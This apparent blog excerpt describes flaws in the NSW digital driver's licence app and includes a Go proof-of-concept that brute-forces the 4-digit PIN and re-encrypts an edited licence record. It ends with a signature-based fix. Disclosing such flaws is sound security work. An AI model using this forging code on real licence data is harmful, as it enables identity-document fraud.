The New South Wales digital driver’s license has multiple implementation flaws that allow for easy forgeries.
This file is encrypted using AES-256-CBC encryption combined with Base64 encoding.
A 4-digit application PIN (which gets set during the initial onboarding when a user first installs the application) is the encryption password used to protect or encrypt the licence data.
The problem here is that an attacker who has access to the encrypted licence data (whether that be through accessing a phone backup, direct access to the device or remote compromise) could easily brute-force this 4-digit PIN by using a script that would try all 10,000 combinations….
[…]
The second design flaw that is favourable for attackers is that the Digital Driver Licence data is never validated against the back-end authority which is the Service NSW API/database.
This means that the application has no native method to validate the Digital Driver Licence data that exists on the phone and thus cannot perform further actions such as warning users when this data has been modified.
As the Digital Licence is stored on the client’s device, validation should take place to ensure the local copy of the data actually matches the Digital Driver’s Licence data that was originally downloaded from the Service NSW API.
As this verification does not take place, an attacker is able to display the edited data on the Service NSW application without any preventative factors.
There’s a lot more in the blog post.
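The two flaws above compose into one offline attack: copy the encrypted blob, try every PIN until the decryption parses, edit the record, and re-encrypt it under the same PIN. The following Go program is an added illustration, not code from the original post or from the researchers who analysed the app. It assumes the PIN is turned into the AES-256 key by a plain SHA-256 hash (the post does not say how the app derives its key, and any derivation leaves the attacker with the same 10,000 candidates), it prepends a random IV to the CBC ciphertext, and it uses a constructed sample record in place of real licence data:

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
)

// Constructed sample record standing in for the licence JSON; not real data.
const sampleLicence = `{"class":"C","dob":"1999-01-02","expiry":"2027-06-30","name":"A. Example"}`

// pinKey turns the PIN into a 256-bit AES key. SHA-256 of the PIN is an assumed
// stand-in for whatever the app does; the keyspace is 10,000 entries either way.
func pinKey(pin string) []byte {
	sum := sha256.Sum256([]byte(pin))
	return sum[:]
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad expects len(b) to be a non-zero multiple of the block size.
func pkcs7Unpad(b []byte) ([]byte, error) {
	p := int(b[len(b)-1])
	if p == 0 || p > aes.BlockSize || !bytes.Equal(b[len(b)-p:], bytes.Repeat([]byte{byte(p)}, p)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-p], nil
}

// EncryptWithPIN mimics the described scheme: AES-256-CBC under a PIN-derived key,
// random IV prepended, Base64 output. There is no MAC and no issuer signature, so
// nothing binds the stored blob to what Service NSW originally issued.
func EncryptWithPIN(pin string, plaintext []byte) (string, error) {
	block, _ := aes.NewCipher(pinKey(pin)) // 32-byte key: cannot fail
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	padded := pkcs7Pad(plaintext)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return base64.StdEncoding.EncodeToString(append(iv, out...)), nil
}

func DecryptWithPIN(pin, b64 string) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("bad ciphertext length")
	}
	block, _ := aes.NewCipher(pinKey(pin))
	out := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(out, raw[aes.BlockSize:])
	return pkcs7Unpad(out)
}

// BruteForcePIN is the offline attack the post describes: try all 10,000 PINs
// against a copied blob. A wrong PIN almost always gives bad padding or
// non-JSON bytes, so "decrypts to valid JSON" is the oracle for the right one.
func BruteForcePIN(b64 string) (string, []byte, bool) {
	for i := 0; i < 10000; i++ {
		pin := fmt.Sprintf("%04d", i)
		if pt, err := DecryptWithPIN(pin, b64); err == nil && json.Valid(pt) {
			return pin, pt, true
		}
	}
	return "", nil, false
}

// TamperLicence is the second flaw in action: recover the PIN, edit one field and
// re-encrypt under the same PIN. Without validation against the back end the app
// cannot tell this blob from the one it originally downloaded.
func TamperLicence(b64, field, value string) (string, error) {
	pin, pt, ok := BruteForcePIN(b64)
	if !ok {
		return "", errors.New("PIN not recovered")
	}
	var rec map[string]string
	if err := json.Unmarshal(pt, &rec); err != nil {
		return "", err
	}
	rec[field] = value
	edited, _ := json.Marshal(rec) // a map[string]string always marshals
	return EncryptWithPIN(pin, edited)
}

func main() {
	blob, _ := EncryptWithPIN("4321", []byte(sampleLicence))
	pin, _, _ := BruteForcePIN(blob)
	forged, _ := TamperLicence(blob, "dob", "2001-01-02")
	pt, err := DecryptWithPIN(pin, forged)
	fmt.Printf("recovered PIN %s; forged blob decrypts cleanly: %v\n%s\n", pin, err == nil, pt)
}
```

The whole search takes milliseconds on a laptop, and the forged blob decrypts without any error because CBC alone offers no integrity. A PIN-derived key can never be fixed by a slower key derivation when the input space is four digits; the fix the post argues for is to have the server vouch for the record, for instance by having Service NSW sign what it issues and having the app verify that signature (or re-fetch the record) before displaying it, so that an edited local copy is rejected.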